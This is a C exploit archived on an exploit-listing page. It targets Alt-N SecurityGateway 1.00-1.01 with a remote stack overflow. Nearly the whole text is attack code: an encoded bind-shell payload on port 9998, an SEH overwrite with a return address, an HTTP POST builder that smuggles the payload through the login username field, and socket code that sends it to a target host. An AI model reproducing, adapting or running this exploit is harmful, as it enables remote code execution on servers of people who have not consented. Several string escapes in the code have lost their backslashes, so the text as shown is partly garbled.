[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit
# Published : 2008-06-15
# Author : Heretic2
# Previous Title : Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)
# Next Title : XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After few days of work i have comed with the required bindshell which bypass
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( <securfrog [at] gmail.com> )
* 2. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);
void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);
struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct {
const char * name;
int length;
char *shellcode;
}shellcodes[]={
{"Bindshell, port 9998", 743,
/* The non-encoded metasploit payload
* windows/shell_bind_tcp - 317 bytes
* http://www.metasploit.com
* Encoder: generic/none
*/
/*
* Encoder: heretic2's nonupper. with help of skylined tool.
*/
"x6ax20x5bx93xf7xe0x91xe8xffxffxffxffx30x5ex5ex66"
"x8bx7ex22x97x3cx60x7cx07x2cx20x66x93x88x5ex22x83"
"xeexffxe2xebxe8xffxffxffxffx36x5bx5bx93x91x83xe9"
"xf8x69x69x69x69x69x69x69x69x69x69x69x71x7ax76x74"
"x78x33x30x76x78x34x61x70x30x61x33x68x68x30x61x30"
"x30x61x62x61x61x62x74x61x61x71x32x61x62x32x62x62"
"x30x62x62x78x70x38x61x63x6ax6ax69x6bx6cx32x6ax6a"
"x6bx70x6dx6ax68x7ax79x6bx6fx6bx6fx6bx6fx33x70x6c"
"x6bx72x6cx36x64x71x34x6cx6bx71x75x77x6cx6cx6bx73"
"x6cx73x35x33x68x35x71x7ax6fx6cx6bx70x6fx35x68x6c"
"x6bx71x6fx67x70x75x71x6ax6bx77x39x6cx6bx77x64x6c"
"x6bx75x71x7ax6ex76x71x69x70x6dx69x6ex6cx6bx34x69"
"x70x72x74x63x37x6fx31x38x6ax74x6dx35x71x79x72x6a"
"x6bx6bx64x77x6bx71x64x67x74x67x78x32x75x6dx35x6c"
"x6bx71x6fx77x74x35x71x6ax6bx32x66x6cx6bx74x6cx70"
"x6bx6cx6bx71x6fx35x6cx75x71x6ax6bx75x73x66x6cx6c"
"x6bx6bx39x62x6cx76x64x75x6cx33x71x6fx33x66x71x79"
"x6bx75x34x6cx6bx71x73x36x70x6cx6bx71x70x74x6cx6c"
"x6bx72x70x75x6cx6ex6dx6cx6bx71x70x35x78x71x6ex73"
"x78x6cx6ex70x6ex64x6ex7ax6cx30x70x6bx6fx78x76x35"
"x36x76x33x32x66x33x78x70x33x77x62x72x68x72x77x34"
"x33x76x72x71x6fx70x74x6bx6fx78x70x62x68x38x6bx6a"
"x6dx6bx6cx77x6bx66x30x6bx6fx78x76x71x6fx6bx39x6a"
"x65x73x76x6dx71x7ax6dx73x38x64x62x70x75x62x6ax35"
"x72x6bx6fx6ex30x72x68x78x79x75x79x6bx65x6ex6dx66"
"x37x6bx6fx79x66x36x33x70x73x71x63x71x63x70x73x71"
"x73x71x63x31x73x36x33x6bx6fx68x70x32x66x65x38x71"
"x37x74x6ex72x66x71x63x6bx39x6bx71x6cx75x73x78x6f"
"x74x75x6ax74x30x6fx37x30x77x6bx6fx79x66x32x6ax64"
"x70x36x31x31x65x6bx6fx6ex30x75x38x6ex64x6ex6dx76"
"x6ex6bx79x71x67x6bx6fx78x76x70x73x70x75x6bx6fx78"
"x70x65x38x6bx75x31x79x6cx66x70x69x30x77x6bx6fx6e"
"x36x70x70x31x64x71x64x76x35x6bx6fx78x70x6cx73x72"
"x68x6dx37x63x69x39x76x32x79x71x67x6bx6fx6ex36x71"
"x65x6bx6fx78x70x73x76x73x7ax35x34x32x66x72x68x75"
"x33x72x6dx6dx79x6bx75x72x6ax76x30x76x39x71x39x68"
"x6cx6bx39x6dx37x72x6ax30x64x6bx39x6bx72x76x71x6f"
"x30x7ax73x6ex6ax6bx6ex70x62x76x6dx6bx6ex67x32x36"
"x6cx6ax33x6cx6dx33x6ax76x78x6ex6bx6ex6bx6ex6bx63"
"x78x73x62x6bx6ex6ex73x74x76x6bx6fx62x75x70x64x6b"
"x6fx38x76x71x6bx76x37x76x32x30x71x30x71x70x71x72"
"x6ax65x71x30x71x30x71x30x75x70x71x6bx6fx78x70x75"
"x38x6ex6dx6ex39x74x65x78x6ex70x73x6bx6fx6ex36x73"
"x7ax6bx6fx6bx6fx36x77x6bx6fx6ex30x6cx6bx36x37x6b"
"x6cx6bx33x69x74x75x34x6bx6fx38x76x66x32x6bx6fx38"
"x70x33x78x7ax70x6cx6ax63x34x71x6fx66x33x6bx6fx6e"
"x36x6bx6fx68x70x61x61"
},
{NULL, 0, NULL}
};
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret
{"DOS/Crash/Debug/Test/Fun", 0x61616161 },
{NULL, 0x00000000 }
};
// memory for buffers
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;
int main(int argc, char **argv)
{
char c,*remotehost=NULL,temp1[100];
int sh,port=4000,itarget=0;
struct _buf fshellcode, sbuffer;
logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
// set defaults
sh=0;
// ------------
while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
{
switch (c)
{
case 'h':
if (strchr(optarg,':')==NULL)
{
remotehost=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &port);
remotehost=optarg;
*(strchr(remotehost,':'))='�';
}
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'T':
sscanf(optarg, "%ld", &dwTimeout);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL)
{
printf(" [-] Please enter remotehostn");
end_logo();
WSACleanup();
return -1;
}
print_info_banner_line("Host", remotehost);
sprintf(temp1, "%d", port);
print_info_banner_line("Port", temp1);
print_info_banner_line("Payload", shellcodes[sh].name);
sprintf(temp1, "%d", 9998);
print_info_banner_line("BINDPort", temp1);
printf(" # ------------------------------------------------------------------- # n");
fflush(stdout);
memset(payloadbuffer, 0, sizeof(payloadbuffer));
fshellcode.ptr=payloadbuffer;
fshellcode.size=0;
memset(a_buffer, 0, sizeof(a_buffer));
sbuffer.ptr=a_buffer;
sbuffer.size=0;
if(!construct_shellcode(sh, &fshellcode, itarget))
{
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Payload constructedn");
if(!construct_buffer(&fshellcode, itarget, &sbuffer))
{
printf(" [-] Buffer not constructedn");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Final buffer constructedn");
if(!execute(&sbuffer, remotehost, port))
{
printf(" [-] Buffer not sentn");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sentn");
end_logo();
WSACleanup();
return 0;
}
int construct_shellcode(int sh, struct _buf * shf, int target)
{
memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
shf->size=shellcodes[sh].length;
return 1;
}
char templ1[] = "POST /SecurityGateway.dll HTTP/1.0rn"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*rn"
"Accept-Language: rurn"
"Content-Type: application/x-www-form-urlencodedrn"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)rn"
"Content-Length: %drnrn";
char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In";
int encode_uri(char * in, int len, char * out, int *outlen)
{
char *out2=out;
int i;
memset(out,0,*outlen);
for(i=0;i<len;i++)
{
*out++='%';
sprintf(out, "%.2x", (unsigned char)in[i]);
out+=2;
}
*outlen=(int)(out-out2);
return 0;
}
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf)
{
unsigned char * cp;
char *lp ;
char buf[10000], buf2[10000],rstr1[10000],rstr2[10000];
int olen;
cp = abuf->ptr;
memset(buf,0,sizeof(buf));
memset(buf2,0,sizeof(buf2));
memset(rstr1,0,sizeof(rstr1));
memset(rstr2,0,sizeof(rstr2));
lp=buf;
// overflow
memset(lp,'x61',476);
lp+=476;
// jmp over seh
*lp++='x90';
*lp++='x90';
*lp++='xeb';
*lp++='x04';
// replace SEH
*lp++ = (char)((targets[target].ret ) & 0xff);
*lp++ = (char)((targets[target].ret >> 8) & 0xff);
*lp++ = (char)((targets[target].ret >> 16) & 0xff);
*lp++ = (char)((targets[target].ret >> 24) & 0xff);
memset(lp,'x90',1500);
lp+=5;
memcpy(lp, shf->ptr, shf->size);
lp+=shf->size;
olen = 1500;
encode_uri(buf, (int)strlen(buf), buf2, &olen);
sprintf(rstr2,templ2,buf2);
sprintf(rstr1,templ1,strlen(rstr2));
strcat((char*)cp,rstr1);
strcat((char*)cp,rstr2);
cp+=strlen((char*)cp);
abuf->size=(int)(cp-abuf->ptr);
return 1;
}
void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
if (strchr(str,':')==NULL)
{
remotehost=str;
}else
{
sscanf(strchr(str,':')+1, "%d", port);
remotehost=str;
*(strchr(remotehost,':'))='�';
}
}
int hr2_connect(char * remotehost, int port, int timeout)
{
SOCKET s;
struct hostent *host;
struct sockaddr_in addr;
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set x;
int res;
if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
host = gethostbyname(remotehost);
if (!host) return SOCKET_ERROR;
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == SOCKET_ERROR)
{
closesocket(s);
return SOCKET_ERROR;
}
unsigned long l = 1;
ioctlsocket( s, FIONBIO, &l ) ;
connect(s, (struct sockaddr*)&addr, sizeof(addr));
FD_ZERO(&x);
FD_SET(s, &x);
res = select(NULL,NULL,&x,NULL,pstTime);
if(res< 0) return SOCKET_ERROR;
if(res==0) return 0;
return (int)s;
}
int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
return send(s, (char *)buf, len, 0);
}
int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set xy;
int res;
if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
FD_ZERO(&xy);
FD_SET(s, &xy);
res = select(NULL,&xy,NULL,NULL,pstTime);
if(res==0) return 0;
if(res<0) return -1;
return recv(s, (char *)buf, len, 0);
}
int execute(struct _buf * abuf, char * remotehost, int port)
{
int x;
SOCKET s ;
char RECVB[10000];
s = hr2_connect(remotehost, port, 10000);
if(s==0)
{
printf(" [-] connect() timeoutn");
return 0;
}
if(s==SOCKET_ERROR)
{
printf(" [-] Connection failedn");
return 0;
}
x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
printf(" [+] Sent %d out of %d bytesn", x, abuf->size);
x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0);
closesocket(s);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '�')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '�')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void print_info_banner_line(const char * key, const char * val)
{
char temp1[100], temp2[100];
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(val) -1);
memset(temp2,0,sizeof(temp2));
memset(temp2, 'x20' , 8 - strlen(key));
printf(" # %s%s: %s%s# n", key, temp2, val, temp1);
}
void usage(char * s)
{
int j;
printf("n");
printf(" Usage: %s -h <host:port> -t <target>n", s);
printf(" -------------------------------------------------------------------n");
printf(" Arguments:n");
printf(" -h ........ host to attack, default port: 4000n");
printf(" -t ........ target to usen");
printf(" -T ........ socket timeoutn");
printf("n");
printf(" Supported SecurityGateway versions:n");
for(j=0; targets[j].t!=0;j++)
{
printf(" %d. %sn",j+1, targets[j].t);
}
printf("n");
printf(" Code execution:n");
for(j=0; shellcodes[j].name!=0;j++)
{
printf(" %d. %sn",j+1, shellcodes[j].name);
}
end_logo();
}
void logo()
{
printf("nn");
printf(" ####################################################################### n");
printf(" # ____ __ _ ______ __ _____ #n");
printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / #n");
printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / #n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ #n");
printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ #n");
printf(" # crew #n");
printf(" ####################################################################### n");
printf(" # Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit # n");
printf(" # Solution: Update to 1.02 version # n");
printf(" # Author : Heretic2 < heretic2x [at] gmail.com > # n");
printf(" # Version : 1.0 # n");
printf(" # System : Windows ALL # n");
printf(" # Date : 11.06.2008 - 14.06.2008 # n");
printf(" # ------------------------------------------------------------------- # n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # n");
printf(" # Dreatica-FXP crew [Heretic2] # n");
printf(" ####################################################################### nn");
}
// www.Syue.com [2008-06-15]